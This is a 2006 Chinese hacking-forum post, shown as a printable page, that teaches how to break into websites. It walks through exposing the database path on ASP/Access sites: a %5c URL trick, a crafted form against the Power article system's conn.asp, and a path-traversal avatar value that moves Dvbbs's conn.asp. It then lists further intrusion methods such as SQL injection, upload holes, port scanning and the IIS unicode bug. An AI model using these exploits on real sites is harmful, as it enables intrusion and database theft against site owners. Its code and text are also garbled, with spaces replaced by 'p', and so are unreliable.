标题:
黑站也就这几招之—暴库
[打印本页]
作者:
烟圈配咖啡
时间:
2006-5-21 13:42
标题:
黑站也就这几招之—暴库
黑站也就这几招之—暴库
首先.看到一个网站,首先要找找有没有SQL注入.因为这个是现在最流行的.不过一般大一点的站是不会有这个洞的,所以.我们就可以试试找找有没有其他的洞.对于很多站,应该会有什么论坛啊,有什么新闻,相册什么的.这我们就想到了上传.嘿嘿,是不是很兴奋啊.一般来说都可以成功的,或者在后面加上upfile.asp.如果不行的话.我们去论坛逛逛,现在大部分用的都是动网的论坛,动网的论坛怎么入侵.网上有很多教程。我这里就不废话了.如果还不可以入侵的话.我们就来试试暴库.什么是暴库呢?我个人理解是把数据库的物理路径给暴露出来啊。嘿嘿.高手见笑了.哈哈哈哈
暴库首先你必须要将internet选项->高级->显示友好信息的钩去掉.然后就可以暴了.不过不是所有的都可以暴,必须是Access的.%5c的暴库需要的是二级目录,一级目录无法成功.好了,上面说的大家都知道,当是废话。在暴库这么好用的东西下,如果一个网站只有一级目录的话,难道就没有办法了吗?
重点哦~
其实一级目录我们也同样可以成功的,我们可以通过构造一个多级目录来达到暴库的目的。
如下:
http://www.target.com/noexists/..%5clist.asp?id=1
这样大家就会有新的惊喜了,呵呵。具体方法如下
1p动力文章系统
pp1)漏洞介绍:由于数据库连接文件INC/conn.asp和数据库文件database/123.mdb都放
在同级目录ACCESS下
而且他们都用的是相对路径,用网站自带的编辑页
"returnpCheckForm();"paction=http://www.target.com/inc
/conn.asppmethod
=postptarget=_parent>pborder=0>p
提交后数据库的路径就会出来了:]
MicrosoftpJETpDatabasepEnginep错误p';80004005';p
';E:\My\ACCESS\inc\database\adsfkldfogowerjnokfdslwejhdfsjhk.mdb';不是一个有效的路径
。p确定路径名称
拼写是否正确,以及是否连接到文件存放的服务器。p
/inc/conn.asp,行9p文章引用了http://www.hackerxfiles.net/bbs/dispbbs.asp?boardID=4&
ID=27293
http://www.xfocus.net/articles/200402/662.html
pp2p动网论坛
pp2)漏洞介绍:方法是源于动力文章系统暴库,因为动网论坛的conn.asp文件和数据库的文件
夹在同一个目录
下,所以如果把conn.asp文件转移到调用他的文件的上级目录,而且是相对路径就可以暴库]
所以想到了前段时间发现的动网论坛可以转移文件的漏洞,漏洞的内容是,在用户修改资料里的
,他对用户自定义
头像地址过滤不严,导致用户通过构造跳转路径,使conn.asp文件转移到上级目录,
漏洞源代码:
';******************p
';对上传头象进行过滤与改名p
ifpCint(Forum_Setting(7))=1pthenp
onperrorpresumepnextp
ppdimpobjFSO,upfilename,newfilenamep
ppdimpupface,memberidp
ppsetprs=conn.execute("selectpuserid,facepfromp[user]pwherepuserid="&userid)p
ppmemberid=rs(0)p
ppupface=trim(rs(1))p
ppnewfilename=""p
upfilename=split(upface,"/")p
ifpubound(upfilename)=1pandpupfilename(0)="uploadFace"pthenp
ifpinstr(upfilename(1),"_")=0pthenp
ppppnewfilename="uploadFace/"&memberid&"_"&upfilename(1)ppppppp/用户定义的头像
变为uploadFace/用户IDp
SetpobjFSOp=pServer.CreateObject("scripting.FileSystemObject")p
ifpobjFSO.fileExists(Server.MapPath(upface))pthenp
objFSO.movefilep""&Server.MapPath(upface)&"",""&Server.MapPath(newfilename)&""p
endpifp
IfpErr.Numberp=p0pThenp
conn.execute("updatep[user]psetpface=';"&newfilename&"';pwherepuserid="&userid)p
endpifp
setpobjFSO=nothingp
endpifp
endpifp
rs.closep
setprs=nothingp
endpifp
';对上传头象进行过滤与改名结束p
';****************p
看看这句:p
newfilename="uploadFace/"&memberid&"_"&upfilename(1)ppp/newfilename=用户定义的
头像变为uploadFace/用户ID_upfilen
ame的另一部分p
再看:p
ifpobjFSO.fileExists(Server.MapPath(upface))pthenp
objFSO.movefilep""&Server.MapPath(upface)&"",""&Server.MapPath(newfilename)&""p
/看见没有?最关键的部分来了,如果检测到upface代表的文件存在,则对改文件进行移动并改名!p
相信大家都在那里把/、\、.和..的作用了解了吧。呵呵,下面我们要做的就是跳转目录把conn.asp
转移过来。在自定义头像地址那里添上这样的一句:p
uploadFace/.\..\conn.aspp(注意大小写)p
前面已经分析过代码了,这句话的意思应该看的懂了吧,我们把“头像”地址指向了上级目录的
conn.asp。由于符合它的判断条件upface存在,所以它就会把conn.asp这个文件转移到uploadFace这
个目录来,这样就符合我们玩动力文章系统的时候的第一个条件了。一般大家用的都是相对路径,所
以下面我们只要调用这个文件就会知道数据库路径。新建一个HTML文件写上如下内容:p
"http://www.target.com/dvbbs/uploadFace/conn.asp
"pframeBorder=0pwidth=500pscrolling=noshadepheight=400>p
安全篇p
看来问题都出在conn.asp本身,不打自招。为了安全我们得好好处理一下它。p
最笨的方法就是把它改名了,让别人猜不到路径。但是它要被很多文件调用,还得改其它地方。p
我们用相对路径的时候,数据库路径会随着调用conn.asp的文件而改变,从而产生了错误。那么我
们就让连接数据库使用绝对路径,这样一来不管谁调用conn.asp数据库路径都不变了。p
我在测试动网这个漏洞的时候,发现对一些比较新的版本,就是文件挪移成功了也暴不出数据库路
径。但是有的6.0版本有效。看来新的版本动网论坛对conn.asp进行了特殊的处理。对比了一下两个不同
的conn.asp,发现新的conn.asp里加了这么一句:p
OnpErrorpResumepNextp
哈哈,这样你就可以暴了,你爱怎么暴你怎么暴
但是如果以上方法不行怎么办.没关系,没有攻不破的网站.当然漏洞其实是很容易利用的,关键在于怎么去发现漏洞.我来拿出宝贝流光扫扫他的IP.你们不要问我.他的IP是什么,其实你按开始---运行.然后输入cmd或者command然后你再ping他的域名,比如
pingpwww.sina.com.cn
你会发现他的IP哈哈哈哈哈
好了我们来扫扫看~~~~~~~~~
这下面的,就要看你扫的是哪些端口了.哪些端口怎么入侵,我想这个大家都清楚.如果不清楚的话.你的基础知识要补一补了,当然我也不是说我是高手,其实我也是菜菜菜鸟啊
编程白痴一个.虽然接触的多.不过都浮在表面..还希望高手多多帮我啊
看到这里.佩服你的耐心.告诉你我的QQ是不可能的,人多耳杂啊!!!嘴一个~~~呵呵
再粗略的补充几点
1.sql注入.傻瓜都会的
2.跨站.因为是绑定在同一个服务器上的.所以可以这样攻击了
3.动网的上传漏洞
4.可以ping他的域名试试.然后拿出扫描器扫扫看有没有什么端口是开着的.然后根据端口入侵
5.想办法知道他的IIS.如果是IIS5以下的试试unicode漏洞
呵呵.还有很多.我就说到这了
作者:
gp5460
时间:
2006-6-1 11:06
标题:
黑站也就这几招之—暴库
嘿嘿,不错的说
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2